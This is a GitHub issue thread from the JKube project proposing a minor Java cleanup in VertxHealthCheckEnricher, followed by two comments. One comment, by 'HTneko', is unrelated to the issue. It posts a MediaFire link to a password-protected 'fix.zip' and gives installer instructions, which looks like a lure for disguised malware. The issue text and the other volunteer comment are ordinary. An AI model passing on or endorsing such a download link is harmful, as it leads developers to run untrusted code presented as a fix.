### ISSUE TITLE
VertxHealthCheckEnricher: Explicit type arguments can be inferred

### ISSUE THREAD

**Issue by manusa** [eclipse-jkube/jkube#3339]
### Description

The class [VertxHealthCheckEnricher](https://github.com/eclipse-jkube/jkube/blob/1ffc921c99a345320ce2a59e2e8bf5bcb5469277/jkube-kit/jkube-kit-vertx/src/main/java/org/eclipse/jkube/vertx/enricher/VertxHealthCheckEnricher.java#L149-L150) presents the issue: Explicit type arguments can be inferred.

The following line:
https://github.com/eclipse-jkube/jkube/blob/1ffc921c99a345320ce2a59e2e8bf5bcb5469277/jkube-kit/jkube-kit-vertx/src/main/java/org/eclipse/jkube/vertx/enricher/VertxHealthCheckEnricher.java#L149-L150
should be changed to:

```java
        List<String> command = getListValue(Config.COMMAND, readiness).orElse(Collections.emptyList());
        Map<String, String> headers = getMapValue(Config.HEADERS, readiness).orElse(Collections.emptyMap());
```
### :red_circle: Before you start :red_circle:

:point_down: :point_down: :point_down: :point_down: :point_down: :point_down: :point_down: :point_down: :point_down: :point_down: :point_down: :point_down: :point_down: :point_down: :point_down: :point_down:

Make sure you read the [contributing guide](https://www.eclipse.org/jkube/contributing) first.

Pay special attention to the ECA agreement section and the requirement to sign-off your commit.

This is a [first-timers-only](https://eclipse.dev/jkube/contributing/#first-timers-only-issues) issue. These issues are especially created for contributors who are contributing to the project for the **first time**.

If you have already contributed to this project in the past, please don't ask to be assigned one of these issues and look for [good-first-issues](https://github.com/eclipse-jkube/jkube/issues?q=is%3Aissue+is%3Aopen+sort%3Aupdated-desc+label%3A%22good+first+issue%22) or [help-wanted](https://github.com/eclipse-jkube/jkube/issues?q=is%3Aissue+is%3Aopen+sort%3Aupdated-desc+label%3A%22help+wanted%22+) issues instead in order to continue you contributor journey in the project.

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Shripad-Joshi** [comment]
Hello @manusa , I would like to work on this issue.
